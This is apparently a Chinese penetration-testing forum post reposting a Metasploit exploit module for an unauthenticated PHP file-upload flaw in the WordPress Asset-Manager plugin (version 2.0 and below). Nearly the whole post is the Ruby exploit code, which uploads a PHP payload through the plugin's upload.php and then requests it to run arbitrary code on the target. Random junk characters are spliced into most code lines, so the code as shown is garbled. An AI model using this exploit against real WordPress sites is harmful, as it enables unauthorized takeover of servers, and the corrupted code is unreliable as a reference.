找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2725|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
' Y; J2 {/ d4 p# t7 t5 k
$ M% @$ G# ^) M: l  {##$ A7 V7 o" M3 P3 P" \% S2 a6 Z
# This file is part of the Metasploit Framework and may be subject to; h; M; P( H7 m9 l) v! s" L2 ~9 W/ L
# redistribution and commercial restrictions. Please see the Metasploit6 p* ?) X( X" `% x
# Framework web site for more information on licensing and terms of use.
7 Q& ?: L9 h+ T- G! U#   http://metasploit.com/framework/
& m$ U, `1 s! f# \- @$ T##3 e7 i; s/ z& B" G6 P; {+ D
) {$ U+ n' H( C4 C6 c1 |6 |
require 'msf/core'
# p) u5 |! L0 `6 brequire 'msf/core/exploit/php_exe'
$ z1 u8 v& `8 Q5 R! s
+ a2 w  a" u. x: vclass Metasploit3 < Msf::Exploit::Remote
- M# n# q) V. q7 d9 e  Rank = ExcellentRanking5 p) M+ q2 E0 ^$ t. Z8 d- J

( Z; G' C  W* N  include Msf::Exploit::Remote::HttpClient
7 }0 x0 C% D' \" [; m  include Msf::Exploit:hpEXE
* W1 B! c  M6 X$ Z
" K: f6 B* p4 U* T; D" m. W  def initialize(info = {})
' Y8 d2 @& @5 ^% d* D$ m8 x    super(update_info(info,
1 P6 d! T/ ]! R2 s& d' N# \      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',, e( Q4 N' E0 f% p$ [$ t/ ]
      'Description'    => %q{; M) C! M, e9 l* r; Z# a/ d
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
! C  X( K( z* h* h5 e. `        plugin.  By abusing the upload.php file, a malicious user can upload a file to a2 i/ N/ s; ]6 i- b  T1 t' p  W4 E
        temp directory without authentication, which results in arbitrary code execution.. r% D0 u( z7 \& z& P7 Y
      },3 p; r8 @) E8 t4 l+ S
      'Author'         =>1 Y* p) C$ j/ M. L# v; A
        [3 s( x9 i; Q7 O6 A. O
          'Sammy FORGIT', # initial discovery
0 K6 A# \. H6 _% T( M8 _          'James Fitts <fitts.james[at]gmail.com>' # metasploit module2 t2 a+ T6 w; t( `
        ],
. m0 i2 {4 ~1 g8 t      'License'        => MSF_LICENSE,
- h) k  |. O, g5 w; T9 B7 U" Z( y( T      'References'     =>
9 [) D( Q" l9 |7 ], m1 k+ J        [
) `3 |; M8 n% V3 _, f6 Z          [ 'OSVDB', '82653' ],1 j+ E/ \! s6 ]: W5 y, O
          [ 'BID', '53809' ],. B2 G5 t  [- c4 |7 `
          [ 'EDB', '18993' ],9 H/ P% ^+ y, s9 n/ ^1 @
          [ 'URL', 'http:// www.myhack58.com /' ]
5 C! k& H( |# \        ],* v. _( ?# m  i5 A; `1 |, g
      'Payload'       =>
. j' s3 b4 I6 m. U8 \& ~6 S: v8 s# z        {5 ?6 t/ E- }7 L( J
          'BadChars' => "\x00",1 h, Q/ b5 M5 H% L+ k
        },0 K" I, i$ v  U# F( \4 U$ b
      'Platform'       => 'php',6 G- A# P2 |/ \& `: J9 j
      'Arch'           => ARCH_PHP,9 C3 v, {( F* S) r4 e+ K/ v1 B
      'Targets'        =>) s. a& b/ E2 D( x
        [
; ?) u. [9 C5 R% M' |3 c          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
- Z0 Z$ V  k" N7 U          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]: {" ~1 |8 A! S
        ],0 t" F& _/ E1 c5 C
      'DefaultTarget' => 0,
! p) s0 ]; G3 m1 e) G      'DisclosureDate' => 'May 26 2012'))
3 O3 C6 U$ a- j: t8 E- \/ q/ H 7 D: j2 y+ @, S* U( \4 C
    register_options(4 W& ^2 x; e9 |& u: \
      [
1 x- L7 r& v! M) f6 j7 s+ |& G        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])9 @: s1 R7 [7 C4 ~+ C
      ], self.class)4 G8 f! `0 m. F9 s" W6 ?
  end
, S* Q2 {& a8 _+ x- B
8 S$ r% q6 Q8 V0 d$ n8 b# {  def exploit( l2 e. l- ^3 A7 q0 _% v
    uri =  target_uri.path# w( m  M- Y- c  U0 C* P
    uri << '/' if uri[-1,1] != '/'
; X% n+ O+ z+ C# F; @: ]2 G0 |    peer = "#{rhost}:#{rport}"
+ |) B; S0 q. ~, X' F( w  b    payload_name = "#{rand_text_alpha(5)}.php"
- M4 L4 |- {! \: T    php_payload = get_write_exec_payload(:unlink_self=>true)
' a% K4 P2 B. f0 J( F0 Z6 q# t 4 Y0 ]# i4 ~, m$ W  Z
    data = Rex::MIME::Message.new
% ~/ U* m% C2 y7 f: [    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")& Y1 I- U: ^+ P  S" e: T4 N
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'). n  \# J% O6 u& o2 o& `
- v7 V2 ?2 |) n, u. Y) ^' B
    print_status("#{peer} - Uploading payload #{payload_name}")+ Q5 M, H7 C! U. e, Z8 P
    res = send_request_cgi({" R  ^! G+ z% ]
      'method'  => 'POST',. G3 S4 e; O" O  c/ p9 ^( s
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",7 ?  i' s4 x2 A. v% z
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
: g7 G4 ^7 P# g8 m' k2 z      'data'    => post_data
- @! S" P; f9 d' Z    })2 u7 M7 k* v4 Q& E
" N; |3 N" y! i' V
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
' C2 @7 O; `2 e, R      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")6 y! M/ N  F  ^, Q: A
end
4 J7 Q' _8 n# ^# s : U; ~5 P) D3 s5 z5 L4 ~7 H! _8 U, F
    print_status("#{peer} - Executing payload #{payload_name}")
2 @* R9 b$ \7 Q$ K( O/ ?    res = send_request_raw({
3 `% Q/ o2 R5 A7 m      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}"," a, a9 }. T: H# l6 \
      'method'  => 'GET'1 \) }8 k! A9 }, z
    })% r+ @) E, D9 m; k2 a$ u
9 ?: e, V* R4 y: R- l
    if res and res.code != 200
) }3 I9 K6 l6 G3 R      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")/ `5 _( s' I0 H( \2 G' x) s* r
    end8 E, N; P. d, |$ A  e) }  W
  end, }; M5 z  X' W: I8 _
end. N/ E& {" C! u- T: k+ I
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表